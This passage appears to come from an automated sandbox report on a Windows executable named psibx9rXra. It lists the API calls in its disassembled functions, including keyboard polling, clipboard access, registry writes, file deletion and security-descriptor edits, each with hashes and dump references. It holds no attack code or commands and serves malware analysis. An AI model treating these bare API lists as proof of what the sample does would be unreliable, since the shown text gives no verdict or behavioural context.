                                                • __swprintf.LIBCMT ref: 00FEC890
                                                • __swprintf.LIBCMT ref: 00FEC8D3
                                                  • Part of subcall function 00F87DE1: _memmove.LIBCMT ref: 00F87E22
                                                • __swprintf.LIBCMT ref: 00FEC927
                                                  • Part of subcall function 00FA3698: __woutput_l.LIBCMT ref: 00FA36F1
                                                • __swprintf.LIBCMT ref: 00FEC975
                                                  • Part of subcall function 00FA3698: __flsbuf.LIBCMT ref: 00FA3713
                                                  • Part of subcall function 00FA3698: __flsbuf.LIBCMT ref: 00FA372B
                                                • __swprintf.LIBCMT ref: 00FEC9C4
                                                • __swprintf.LIBCMT ref: 00FECA13
                                                • __swprintf.LIBCMT ref: 00FECA62
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                • API String ID: 3953360268-2428617273
                                                • Opcode ID: e2ea4e57d51a2cac33ce0e1f887e008580aa67c2156a2417a0cf0654c4c74390
                                                • Instruction ID: 1bd10f1f2e0b27da830c8bdce842a738bd9e5341c87c040b3da5f2d30056acbb
                                                • Opcode Fuzzy Hash: e2ea4e57d51a2cac33ce0e1f887e008580aa67c2156a2417a0cf0654c4c74390
                                                • Instruction Fuzzy Hash: 96A13AB2408345ABC750FFA4CC85DAFB7ECAF94704F440919F58586291EB78DA09DB62
                                                APIs
                                                • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 00FEEFB6
                                                • _wcscmp.LIBCMT ref: 00FEEFCB
                                                • _wcscmp.LIBCMT ref: 00FEEFE2
                                                • GetFileAttributesW.KERNEL32(?), ref: 00FEEFF4
                                                • SetFileAttributesW.KERNEL32(?,?), ref: 00FEF00E
                                                • FindNextFileW.KERNEL32(00000000,?), ref: 00FEF026
                                                • FindClose.KERNEL32(00000000), ref: 00FEF031
                                                • FindFirstFileW.KERNEL32(*.*,?), ref: 00FEF04D
                                                • _wcscmp.LIBCMT ref: 00FEF074
                                                • _wcscmp.LIBCMT ref: 00FEF08B
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00FEF09D
                                                • SetCurrentDirectoryW.KERNEL32(01038920), ref: 00FEF0BB
                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 00FEF0C5
                                                • FindClose.KERNEL32(00000000), ref: 00FEF0D2
                                                • FindClose.KERNEL32(00000000), ref: 00FEF0E4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                • String ID: *.*
                                                • API String ID: 1803514871-438819550
                                                • Opcode ID: 118b31de7cdd4597fb57b6b8f1e2091e7f29fb7404078a921f0c66b820d1c0b8
                                                • Instruction ID: 6715c5ec03d67346584b2e93e39a0ff240df85a956c6b00e41c8116f59347974
                                                • Opcode Fuzzy Hash: 118b31de7cdd4597fb57b6b8f1e2091e7f29fb7404078a921f0c66b820d1c0b8
                                                • Instruction Fuzzy Hash: 7A31053290024A7FDB20DFA5DC48ADE77AC9F45370F0441A6F940D2091DB35DA48EB51
                                                APIs
                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 01000953
                                                • RegCreateKeyExW.ADVAPI32(?,?,00000000,0100F910,00000000,?,00000000,?,?), ref: 010009C1
                                                • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 01000A09
                                                • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 01000A92
                                                • RegCloseKey.ADVAPI32(?), ref: 01000DB2
                                                • RegCloseKey.ADVAPI32(00000000), ref: 01000DBF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: Close$ConnectCreateRegistryValue
                                                • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                • API String ID: 536824911-966354055
                                                • Opcode ID: 4817243cea9a4359cadc35131def088e43f67b4a5bcfffeebb949d660a6a0d73
                                                • Instruction ID: aa571218560dc52ec87d28a138237615673d9f1db4e084b87ed3bc2d67a801b4
                                                • Opcode Fuzzy Hash: 4817243cea9a4359cadc35131def088e43f67b4a5bcfffeebb949d660a6a0d73
                                                • Instruction Fuzzy Hash: 00029C752046029FDB55EF18C880E6AB7E5FF89314F08845DF88A9B3A2CB74ED41DB81
                                                APIs
                                                • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 00FEF113
                                                • _wcscmp.LIBCMT ref: 00FEF128
                                                • _wcscmp.LIBCMT ref: 00FEF13F
                                                  • Part of subcall function 00FE4385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00FE43A0
                                                • FindNextFileW.KERNEL32(00000000,?), ref: 00FEF16E
                                                • FindClose.KERNEL32(00000000), ref: 00FEF179
                                                • FindFirstFileW.KERNEL32(*.*,?), ref: 00FEF195
                                                • _wcscmp.LIBCMT ref: 00FEF1BC
                                                • _wcscmp.LIBCMT ref: 00FEF1D3
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00FEF1E5
                                                • SetCurrentDirectoryW.KERNEL32(01038920), ref: 00FEF203
                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 00FEF20D
                                                • FindClose.KERNEL32(00000000), ref: 00FEF21A
                                                • FindClose.KERNEL32(00000000), ref: 00FEF22C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                • String ID: *.*
                                                • API String ID: 1824444939-438819550
                                                • Opcode ID: c3dd9f6944233efb27729da1ded6cdc95a3d47193edb46902abca2a2dfdf139f
                                                • Instruction ID: b861d18ee80ff1a400c48878fd7223f3a41c7e1ddc076cd8b481ba1c374ab959
                                                • Opcode Fuzzy Hash: c3dd9f6944233efb27729da1ded6cdc95a3d47193edb46902abca2a2dfdf139f
                                                • Instruction Fuzzy Hash: A631253690025E7BDB20ABB5EC48ADE73AC9F85370F1441A6F940E2090DB35DE49EB54
                                                APIs
                                                • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00FEA20F
                                                • __swprintf.LIBCMT ref: 00FEA231
                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 00FEA26E
                                                • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00FEA293
                                                • _memset.LIBCMT ref: 00FEA2B2
                                                • _wcsncpy.LIBCMT ref: 00FEA2EE
                                                • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00FEA323
                                                • CloseHandle.KERNEL32(00000000), ref: 00FEA32E
                                                • RemoveDirectoryW.KERNEL32(?), ref: 00FEA337
                                                • CloseHandle.KERNEL32(00000000), ref: 00FEA341
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                • String ID: :$\$\??\%s
                                                • API String ID: 2733774712-3457252023
                                                • Opcode ID: 793c3db50865cd7a995156204edac15296693cc3e48f75f4462e7347b16c84cc
                                                • Instruction ID: bc688e4374c14a755ed9db27fe12910a3618f8b30395937a4f8d60cdd2d25cb6
                                                • Opcode Fuzzy Hash: 793c3db50865cd7a995156204edac15296693cc3e48f75f4462e7347b16c84cc
                                                • Instruction Fuzzy Hash: DF3104B190024AABDB31DFA1DC49FEB37BCEF89710F1040B6F609D2150E775A644AB25
                                                APIs
                                                  • Part of subcall function 00FD8202: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00FD821E
                                                  • Part of subcall function 00FD8202: GetLastError.KERNEL32(?,00FD7CE2,?,?,?), ref: 00FD8228
                                                  • Part of subcall function 00FD8202: GetProcessHeap.KERNEL32(00000008,?,?,00FD7CE2,?,?,?), ref: 00FD8237
                                                  • Part of subcall function 00FD8202: HeapAlloc.KERNEL32(00000000,?,00FD7CE2,?,?,?), ref: 00FD823E
                                                  • Part of subcall function 00FD8202: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00FD8255
                                                  • Part of subcall function 00FD829F: GetProcessHeap.KERNEL32(00000008,00FD7CF8,00000000,00000000,?,00FD7CF8,?), ref: 00FD82AB
                                                  • Part of subcall function 00FD829F: HeapAlloc.KERNEL32(00000000,?,00FD7CF8,?), ref: 00FD82B2
                                                  • Part of subcall function 00FD829F: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00FD7CF8,?), ref: 00FD82C3
                                                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00FD7D13
                                                • _memset.LIBCMT ref: 00FD7D28
                                                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00FD7D47
                                                • GetLengthSid.ADVAPI32(?), ref: 00FD7D58
                                                • GetAce.ADVAPI32(?,00000000,?), ref: 00FD7D95
                                                • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00FD7DB1
                                                • GetLengthSid.ADVAPI32(?), ref: 00FD7DCE
                                                • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00FD7DDD
                                                • HeapAlloc.KERNEL32(00000000), ref: 00FD7DE4
                                                • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00FD7E05
                                                • CopySid.ADVAPI32(00000000), ref: 00FD7E0C
                                                • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00FD7E3D
                                                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00FD7E63
                                                • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00FD7E77
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                • String ID:
                                                • API String ID: 3996160137-0
                                                • Opcode ID: e58f50eb3564cd2411baa3fa52840dea1d90629b21f9cb6b1c3fa12f3f4f866c
                                                • Instruction ID: 751aac5a97781b6e50730bceaafe515833fc20e98cb5e69daebfa6373730f83f
                                                • Opcode Fuzzy Hash: e58f50eb3564cd2411baa3fa52840dea1d90629b21f9cb6b1c3fa12f3f4f866c
                                                • Instruction Fuzzy Hash: B1615F7190420AAFDF11DF94DC45AEEBB7AFF44310F08815AF915AA341EB359A05EB60
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                                                • API String ID: 0-4052911093
                                                • Opcode ID: 4e3fb52a3ac8624e3fa4fd5a9ae1fd1861a5c374ff335d8994a60a28c4d3d070
                                                • Instruction ID: 808a6a8eb70b84ddd9160eb1b3c159a91877e08e0ed9314e8cf469484cbcbb57
                                                • Opcode Fuzzy Hash: 4e3fb52a3ac8624e3fa4fd5a9ae1fd1861a5c374ff335d8994a60a28c4d3d070
                                                • Instruction Fuzzy Hash: B6726175E00219DBEF24DF59D8807AEB7B5FF44320F14815AE849EB380EB749981EB90
                                                APIs
                                                • GetKeyboardState.USER32(?), ref: 00FE0097
                                                • SetKeyboardState.USER32(?), ref: 00FE0102
                                                • GetAsyncKeyState.USER32(000000A0), ref: 00FE0122
                                                • GetKeyState.USER32(000000A0), ref: 00FE0139
                                                • GetAsyncKeyState.USER32(000000A1), ref: 00FE0168
                                                • GetKeyState.USER32(000000A1), ref: 00FE0179
                                                • GetAsyncKeyState.USER32(00000011), ref: 00FE01A5
                                                • GetKeyState.USER32(00000011), ref: 00FE01B3
                                                • GetAsyncKeyState.USER32(00000012), ref: 00FE01DC
                                                • GetKeyState.USER32(00000012), ref: 00FE01EA
                                                • GetAsyncKeyState.USER32(0000005B), ref: 00FE0213
                                                • GetKeyState.USER32(0000005B), ref: 00FE0221
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: State$Async$Keyboard
                                                • String ID:
                                                • API String ID: 541375521-0
                                                • Opcode ID: 39934009732a92e584e6f0f5a716aa782012b69d67a6ab313cbb68c88661502f
                                                • Instruction ID: 7371a6f91b01a04fb963dca6df52a666c0ae9cd5669256c0e4e8244ed9eaf3f5
                                                • Opcode Fuzzy Hash: 39934009732a92e584e6f0f5a716aa782012b69d67a6ab313cbb68c88661502f
                                                • Instruction Fuzzy Hash: B551DB30D047C819FB35DBA288547EABFB49F01390F08459A96C65A5C2DEE89BCCE761
                                                APIs
                                                  • Part of subcall function 01000E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00FFFDAD,?,?), ref: 01000E31
                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 010004AC
                                                  • Part of subcall function 00F89837: __itow.LIBCMT ref: 00F89862
                                                  • Part of subcall function 00F89837: __swprintf.LIBCMT ref: 00F898AC
                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0100054B
                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 010005E3
                                                • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 01000822
                                                • RegCloseKey.ADVAPI32(00000000), ref: 0100082F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                • String ID:
                                                • API String ID: 1240663315-0
                                                • Opcode ID: d8cabbf60d0127772cc6b178e08d51c61e12616a0d7e08712bcec04f6e187e78
                                                • Instruction ID: 6907eacb0ca3c27808b68fecf9222c7f58c7378552109c37ae9729dd9ccd6cf4
                                                • Opcode Fuzzy Hash: d8cabbf60d0127772cc6b178e08d51c61e12616a0d7e08712bcec04f6e187e78
                                                • Instruction Fuzzy Hash: 69E1AF30204201AFDB55DF28C884E6BBBE4FF89354F04856DF88ADB2A5DB35E905DB91
                                                APIs
                                                  • Part of subcall function 00F89837: __itow.LIBCMT ref: 00F89862
                                                  • Part of subcall function 00F89837: __swprintf.LIBCMT ref: 00F898AC
                                                • CoInitialize.OLE32 ref: 00FF8403
                                                • CoUninitialize.OLE32 ref: 00FF840E
                                                • CoCreateInstance.OLE32(?,00000000,00000017,01012BEC,?), ref: 00FF846E
                                                • IIDFromString.OLE32(?,?), ref: 00FF84E1
                                                • VariantInit.OLEAUT32(?), ref: 00FF857B
                                                • VariantClear.OLEAUT32(?), ref: 00FF85DC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                • API String ID: 834269672-1287834457
                                                • Opcode ID: d84961ee85cd0b2f81b20f34829ebab7db9bbd0052c1b0b223fcf0a44687bdca
                                                • Instruction ID: 852d06c73f9298012f66587e4a105dbf9f70a3e457cc03e4a8aa815999bcbe65
                                                • Opcode Fuzzy Hash: d84961ee85cd0b2f81b20f34829ebab7db9bbd0052c1b0b223fcf0a44687bdca
                                                • Instruction Fuzzy Hash: 0961E1716083169FC711EF14C888F6EB7E8AF457A4F08450DFA819B2A1CB74ED45EB92
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                • String ID:
                                                • API String ID: 1737998785-0
                                                • Opcode ID: 3b82851525578eea01b067951ee09f11486c877e78db17c3363c1e5169c0314a
                                                • Instruction ID: 3232a8b616128fb4a5ad2e1a9c54c6df7c709961502bdb90be5459ff2fbfed9e
                                                • Opcode Fuzzy Hash: 3b82851525578eea01b067951ee09f11486c877e78db17c3363c1e5169c0314a
                                                • Instruction Fuzzy Hash: 3321D6356002159FDB21AF24DC49B7E7BA8EF05320F148016F986DB261DB79AC00EB84
                                                APIs
                                                  • Part of subcall function 00F84750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F84743,?,?,00F837AE,?), ref: 00F84770
                                                  • Part of subcall function 00FE4A31: GetFileAttributesW.KERNEL32(?,00FE370B), ref: 00FE4A32
                                                • FindFirstFileW.KERNEL32(?,?), ref: 00FE38A3
                                                • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00FE394B
                                                • MoveFileW.KERNEL32(?,?), ref: 00FE395E
                                                • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00FE397B
                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 00FE399D
                                                • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00FE39B9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                • String ID: \*.*
                                                • API String ID: 4002782344-1173974218
                                                • Opcode ID: 9c2299943be391426f458a5a1cd09c54819afdf6ccda466503ebcf2d7fdf12db
                                                • Instruction ID: 3a57e8c9bbc204c79df7ea3807f702afc0349075e3a035053095970a5e5a0d06
                                                • Opcode Fuzzy Hash: 9c2299943be391426f458a5a1cd09c54819afdf6ccda466503ebcf2d7fdf12db
                                                • Instruction Fuzzy Hash: 9F51903180518DABCF11FBA1DD9A9EDB779AF10310F600069E40277192EB39AF0DEB61
                                                APIs
                                                  • Part of subcall function 00F87DE1: _memmove.LIBCMT ref: 00F87E22
                                                • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00FEF440
                                                • Sleep.KERNEL32(0000000A), ref: 00FEF470
                                                • _wcscmp.LIBCMT ref: 00FEF484
                                                • _wcscmp.LIBCMT ref: 00FEF49F
                                                • FindNextFileW.KERNEL32(?,?), ref: 00FEF53D
                                                • FindClose.KERNEL32(00000000), ref: 00FEF553
                                                Strings
